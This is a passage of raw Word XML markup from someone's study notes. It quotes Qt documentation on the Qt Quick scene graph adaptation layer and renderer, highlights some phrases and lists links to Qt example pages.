          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00B86726">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addition</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86726">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B86726">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> API, the scene graph has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adaptation layer</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opens up the implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do hardware specific</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> adaptations. This is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undocumented</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>private plugin API</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which lets </w:t>
      </w:r>
      <w:r w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hardware adaptation teams</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> make the most of their hardware. </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>It includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom textures; specifically the implementation of</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2035" w:anchor="createTextureFromImage" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::createTextureFromImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the internal representation of the texture used by</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2036" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2037" w:anchor="borderimage" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BorderImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00974C4A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom renderer; the adaptation layer lets the plugin decide how the scene graph is traversed and rendered, making it possible to optimize the rendering algorithm for a specific hardware or to make use of extensions which improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom scene graph implementation of many of the default QML types, including its text and font rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom animation driver; allows the animation system to hook into the low-level display vertical refresh to get smooth rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom render loop; allows better control over how QML deals with multiple windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="00C511F4" w:rsidRDefault="00C511F4" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00974C4A" w:rsidRPr="00974C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom control is not important for me now.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A037EF" w:rsidRDefault="00A037EF" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2038" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-scenegraph-customgeometry-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2039" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-scenegraph-simplematerial-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2040" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2041" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-scenegraph-openglunderqml-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2042" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-scenegraph-textureinsgnode-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2043" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-scenegraph-textureinthread-example.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00815754" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A037EF" w:rsidRPr="00302D13" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2044" w:history="1">
        <w:r w:rsidR="00815754" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph-renderer.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00C511F4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1672" w:name="_Toc483000893"/>
      <w:bookmarkStart w:id="1673" w:name="_Toc483003884"/>
      <w:bookmarkStart w:id="1674" w:name="_Toc483604237"/>
      <w:bookmarkStart w:id="1675" w:name="_Toc483605457"/>
      <w:r w:rsidRPr="00C511F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Scene Graph Renderer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1672"/>
      <w:bookmarkEnd w:id="1673"/>
      <w:bookmarkEnd w:id="1674"/>
      <w:bookmarkEnd w:id="1675"/>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This document explains </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how the scene graph renderer works internally</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that one can write code that </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses it in an optimal fashion</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, both </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance-wise</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>feature-wise</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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One </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not need</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to understand the internals of the renderer </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
